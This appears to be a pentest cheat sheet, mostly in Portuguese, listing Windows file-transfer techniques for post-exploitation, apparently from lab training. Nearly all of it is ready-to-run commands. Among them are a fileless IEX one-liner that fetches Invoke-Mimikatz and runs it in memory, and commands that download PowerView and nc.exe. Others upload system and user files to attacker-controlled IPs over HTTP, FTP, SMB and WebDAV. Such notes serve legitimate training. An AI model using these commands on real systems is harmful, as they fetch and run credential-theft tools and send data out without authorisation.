Windows File Transfer Methods

Powershell

• Download de um arquivo

(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')

• PowerShell DownloadString - Método sem arquivo

Em vez de baixar um script do PowerShell para o disco, podemos executá-lo diretamente na memória usando o cmdlet Invoke-Expression ou o alias IEX

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

• PowerShell Invoke-WebRequest

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

• Ignorar erros comuns de download no IE

Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX

• Outro erro nos downloads do PowerShell está relacionado ao canal seguro SSL/TLS se o certificado não for confiável. Podemos ignorar esse erro com o seguinte comando:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

---

SMB Downloads

• Create the SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare

• Copy a File from the SMB Server

copy \\192.168.220.133\share\nc.exe

• Crie o servidor SMB com um nome de usuário e senha

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

• Monte o servidor SMB com nome de usuário e senha

net use n: \\192.168.220.133\share /user:test test

---

FTP Downloads

• Instalando o módulo Python3 do servidor FTP - pyftpdlib

sudo pip3 install pyftpdlib

• Configurando um servidor FTP Python3

sudo python3 -m pyftpdlib --port 21

• Transferindo arquivos de um servidor FTP usando o PowerShell

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

---

PowerShell Web Uploads

• Instalando um WebServer

pip3 install uploadserver

• Configurando o Upload

python3 -m uploadserver

• Script do PowerShell para carregar um arquivo no servidor de upload do Python

Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

• Carregamento da Web do PowerShell Base64

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

• Capturamos os dados base64 com o Netcat e usamos o aplicativo base64 com a opção decode para converter a string no arquivo.

nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts

---

SMB Uploads

• Instalando módulos Python do WebDav

sudo pip3 install wsgidav cheroot

• Usando o módulo Python WebDav

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous 

• Conectando-se ao Webdav Share

dir \\192.168.49.128\DavWWWRoot

• Carregando arquivos usando SMB

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

---

FTP Uploads

sudo python3 -m pyftpdlib --port 21 --write

• Arquivo de upload do PowerShell

(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')